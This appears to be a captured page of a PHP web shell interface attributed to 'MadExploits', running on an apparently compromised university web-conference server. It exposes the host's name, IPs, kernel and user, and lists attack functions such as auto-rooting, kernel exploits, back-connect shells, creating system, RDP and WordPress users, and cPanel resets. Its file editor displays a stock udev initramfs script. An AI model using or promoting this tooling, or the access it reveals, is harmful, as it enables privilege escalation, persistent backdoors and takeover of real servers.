Linux web-conference.aiou.edu.pk 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64
Apache/2.4.41 (Ubuntu)
: 172.16.50.247 | : 3.17.110.91
Cant Read [ /etc/named.conf ]
7.4.3-4ubuntu2.28
appadmin
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
share /
initramfs-tools /
scripts /
init-bottom /
[ HOME SHELL ]
Name
Size
Permission
Action
cloud-initramfs-dyn-netconf
5.08
KB
-rwxr-xr-x
copymods
2.02
KB
-rwxr-xr-x
lvm2
370
B
-rwxr-xr-x
overlayroot
24.94
KB
-rwxr-xr-x
plymouth
186
B
-rwxr-xr-x
udev
612
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : udev
#!/bin/sh -e PREREQS="" prereqs() { echo "$PREREQS"; } case "$1" in prereqs) prereqs exit 0 ;; esac # Stop udevd, we'll miss a few events while we run init, but we catch up udevadm control --exit # move the /dev tmpfs to the rootfs; fall back to util-linux mount that does # not understand -o move mount -n -o move /dev "${rootmnt:?}/dev" || mount -n --move /dev "${rootmnt}/dev" # create a temporary symlink to the final /dev for other initramfs scripts if command -v nuke >/dev/null; then nuke /dev else # shellcheck disable=SC2114 rm -rf /dev fi ln -s "${rootmnt}/dev" /dev
Close